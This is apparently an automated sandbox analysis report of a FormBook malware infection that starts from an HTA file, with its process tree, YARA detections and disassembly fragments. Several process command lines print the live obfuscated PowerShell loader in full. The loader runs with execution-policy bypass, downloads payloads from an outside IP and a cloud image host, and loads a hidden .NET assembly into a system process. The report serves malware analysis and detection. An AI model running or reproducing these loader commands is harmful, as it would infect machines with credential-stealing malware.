                                                                                                      2024-12-04 12:08:27 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                      Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:07:08:13
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\bestimylover.hta"
                                                                                                      Imagebase:0x9f0000
                                                                                                      File size:13'312 bytes
                                                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:07:08:14
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"
                                                                                                      Imagebase:0xa40000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:2
                                                                                                      Start time:07:08:14
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:07:08:14
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"
                                                                                                      Imagebase:0xa80000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:4
                                                                                                      Start time:07:08:16
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline"
                                                                                                      Imagebase:0xfc0000
                                                                                                      File size:2'141'552 bytes
                                                                                                      MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:5
                                                                                                      Start time:07:08:17
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES66CD.tmp" "c:\Users\user\AppData\Local\Temp\hfoj0pnm\CSC102A1040D3F84A7CBD6AF35F51E7FDEF.TMP"
                                                                                                      Imagebase:0x140000
                                                                                                      File size:46'832 bytes
                                                                                                      MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:7
                                                                                                      Start time:07:08:23
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS"
                                                                                                      Imagebase:0x890000
                                                                                                      File size:147'456 bytes
                                                                                                      MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:8
                                                                                                      Start time:07:08:23
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = 'JHNlcmVuYWRlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGZ1Z3VzID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskYm94aWVyID0gJGZ1Z3VzLkRvd25sb2FkRGF0YSgkc2VyZW5hZGUpOyRwYXJ0aWN1bGFyaXplID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGJveGllcik7JHBsYWlubmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmF0dGxlYm94ZXMgPSAnPDxCQVNFNjRfRU5EPj4nOyRzdXBlcnByb2ZpdCA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHBsYWlubmVzcyk7JGNhbnRpbGxhdGluZyA9ICRwYXJ0aWN1bGFyaXplLkluZGV4T2YoJHJhdHRsZWJveGVzKTskc3VwZXJwcm9maXQgLWdlIDAgLWFuZCAkY2FudGlsbGF0aW5nIC1ndCAkc3VwZXJwcm9maXQ7JHN1cGVycHJvZml0ICs9ICRwbGFpbm5lc3MuTGVuZ3RoOyR1bmZyZWVkID0gJGNhbnRpbGxhdGluZyAtICRzdXBlcnByb2ZpdDskdmluY2FzID0gJHBhcnRpY3VsYXJpemUuU3Vic3RyaW5nKCRzdXBlcnByb2ZpdCwgJHVuZnJlZWQpOyRwcm9ib3NjaWRpYW4gPSAtam9pbiAoJHZpbmNhcy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkdmluY2FzLkxlbmd0aCldOyRrb21vbmRvciA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHByb2Jvc2NpZGlhbik7JG51cnNlcnltYW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRrb21vbmRvcik7JGdhcm5pZXJpdGUgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskZ2Fybmllcml0ZS5JbnZva2UoJG51bGwsIEAoJ3R4dC5GREdGUi80NDIvNTcxLjQ0LjI3MS43MDEvLzpwdHRoJywgJyRzYXlzdCcsICckc2F5c3QnLCAnJHNheXN0JywgJ2FzcG5ldF9jb21waWxlcicsICckc2F5c3QnLCAnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnJHNheXN0JywnMScsJyRzYXlzdCcpKTs=';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs
                                                                                                      Imagebase:0xa80000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:9
                                                                                                      Start time:07:08:23
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:11
                                                                                                      Start time:07:08:45
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                      Imagebase:0x330000
                                                                                                      File size:56'368 bytes
                                                                                                      MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:12
                                                                                                      Start time:07:08:45
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                                                                      Imagebase:0xcd0000
                                                                                                      File size:56'368 bytes
                                                                                                      MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2122879253.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2138725831.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:15
                                                                                                      Start time:07:09:13
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe"
                                                                                                      Imagebase:0x770000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2658015654.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:16
                                                                                                      Start time:07:09:14
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\msinfo32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\SysWOW64\msinfo32.exe"
                                                                                                      Imagebase:0x8f0000
                                                                                                      File size:338'432 bytes
                                                                                                      MD5 hash:5C49B7B55D4AF40DB1047E08484D6656
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2658176307.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2658252130.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:17
                                                                                                      Start time:07:09:29
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe"
                                                                                                      Imagebase:0x770000
                                                                                                      File size:140'800 bytes
                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:false

                                                                                                      General

                                                                                                      Target ID:19
                                                                                                      Start time:07:09:41
                                                                                                      Start date:04/12/2024
                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                      Imagebase:0x7ff6d20e0000
                                                                                                      File size:676'768 bytes
                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Disassembly

                                                                                                      Reset < >

                                                                                                        Executed Functions

                                                                                                        Function 06DB0FDF Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1439005692.0000000006DB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_6db0000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction ID: 1c8f2805549fd45628e10151a6b7e152156da09fe91a6f835cc12ecff2eb4f2b
                                                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Function 06DB0FD7 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1439005692.0000000006DB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_6db0000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction ID: 1c8f2805549fd45628e10151a6b7e152156da09fe91a6f835cc12ecff2eb4f2b
                                                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Function 06DB0FE7 Relevance: .0, Instructions: 4COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000003.1439005692.0000000006DB0000.00000010.00000800.00020000.00000000.sdmp, Offset: 06DB0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_3_6db0000_mshta.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction ID: 1c8f2805549fd45628e10151a6b7e152156da09fe91a6f835cc12ecff2eb4f2b
                                                                                                        • Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
                                                                                                        • Instruction Fuzzy Hash:

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.9%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:48
                                                                                                        Total number of Limit Nodes:6
                                                                                                        execution_graph 13960 32f7570 13961 32f7573 13960->13961 13962 32f75fe 13961->13962 13968 32f7a08 13961->13968 13976 32f7c45 13961->13976 13983 32f7da8 13961->13983 13990 32f7a18 13961->13990 13963 32f75df 13973 32f7a18 13968->13973 13970 32f7ea8 13970->13963 13971 32f7d57 URLDownloadToFileW 13971->13970 13972 32f7b30 13972->13963 13973->13971 13973->13972 13998 7904610 13973->13998 14007 79045f7 13973->14007 13978 32f7b9a 13976->13978 13980 32f7d57 URLDownloadToFileW 13978->13980 13981 7904610 4 API calls 13978->13981 13982 79045f7 4 API calls 13978->13982 13979 32f7ea8 13979->13963 13980->13979 13981->13980 13982->13980 13984 32f7cf9 13983->13984 13988 7904610 4 API calls 13984->13988 13989 79045f7 4 API calls 13984->13989 13986 32f7ea8 13986->13963 13987 32f7d57 URLDownloadToFileW 13987->13986 13988->13987 13989->13987 13995 32f7a4c 13990->13995 13992 32f7ea8 13992->13963 13993 32f7b30 13993->13963 13994 32f7d57 URLDownloadToFileW 13994->13992 13995->13993 13995->13994 13996 7904610 4 API calls 13995->13996 13997 79045f7 4 API calls 13995->13997 13996->13994 13997->13994 13999 7904a93 13998->13999 14000 7904641 13998->14000 13999->13971 14000->13999 14002 32f7a08 5 API calls 14000->14002 14003 32f7a18 5 API calls 14000->14003 14004 32f7da8 5 API calls 14000->14004 14005 32f7c45 5 API calls 14000->14005 14016 32f1c00 14000->14016 14001 7904a34 14001->13971 14002->14001 14003->14001 14004->14001 14005->14001 14008 7904608 14007->14008 14009 7904a93 14008->14009 14011 32f7a08 5 API calls 14008->14011 14012 32f7a18 5 API calls 14008->14012 14013 32f7da8 5 API calls 14008->14013 14014 32f7c45 5 API calls 14008->14014 14015 32f1c00 URLDownloadToFileW 14008->14015 14009->13971 14010 7904a34 14010->13971 14011->14010 14012->14010 14013->14010 14014->14010 14015->14010 14017 32f7e00 URLDownloadToFileW 14016->14017 14019 32f7ea8 14017->14019 14019->14001

                                                                                                        Executed Functions

                                                                                                        Function 032F7A18 Relevance: 1.9, APIs: 1, Instructions: 362COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 299 32f7a18-32f7a4a 300 32f7a4c-32f7a53 299->300 301 32f7a90 299->301 302 32f7a55-32f7a62 300->302 303 32f7a64 300->303 304 32f7a93-32f7acf 301->304 305 32f7a66-32f7a68 302->305 303->305 310 32f7b58-32f7b63 304->310 311 32f7ad5-32f7ade 304->311 308 32f7a6f-32f7a71 305->308 309 32f7a6a-32f7a6d 305->309 312 32f7a73-32f7a80 308->312 313 32f7a82 308->313 314 32f7a8e 309->314 315 32f7b65-32f7b68 310->315 316 32f7b72-32f7b94 310->316 311->310 317 32f7ae0-32f7ae6 311->317 318 32f7a84-32f7a86 312->318 313->318 314->304 315->316 325 32f7c5e-32f7d52 316->325 326 32f7b9a-32f7ba3 316->326 319 32f7aec-32f7af9 317->319 320 32f7de8-32f7dfd 317->320 318->314 323 32f7b4f-32f7b56 319->323 324 32f7afb-32f7b2e 319->324 330 32f7dff-32f7e52 320->330 331 32f7e73-32f7e7a 320->331 323->310 323->317 342 32f7b4b 324->342 343 32f7b30-32f7b33 324->343 378 32f7d55 call 7904610 325->378 379 32f7d55 call 79045f7 325->379 326->320 328 32f7ba9-32f7be7 326->328 353 32f7be9-32f7bff 328->353 354 32f7c01-32f7c14 328->354 344 32f7e5d-32f7e63 330->344 345 32f7e54-32f7e5a 330->345 334 32f7e7c-32f7e83 331->334 335 32f7e84-32f7ea6 URLDownloadToFileW 331->335 334->335 338 32f7eaf-32f7ec3 335->338 339 32f7ea8-32f7eae 335->339 339->338 342->323 347 32f7b3f-32f7b48 343->347 348 32f7b35-32f7b38 343->348 350 32f7e65-32f7e6e 344->350 351 32f7e71 344->351 345->344 348->347 350->351 351->331 355 32f7c16-32f7c1d 353->355 354->355 357 32f7c1f-32f7c30 355->357 358 32f7c42 355->358 357->358 361 32f7c32-32f7c3b 357->361 358->325 361->358 372 32f7d57-32f7d60 373 32f7d7a-32f7d8d 372->373 374 32f7d62-32f7d78 372->374 375 32f7d8f-32f7d96 373->375 374->375 376 32f7d98-32f7d9e 375->376 377 32f7da5 375->377 376->377 377->320 378->372 379->372
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1544069775.00000000032F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_32f0000_powershell.jbxd
                                                                                                        Similarity
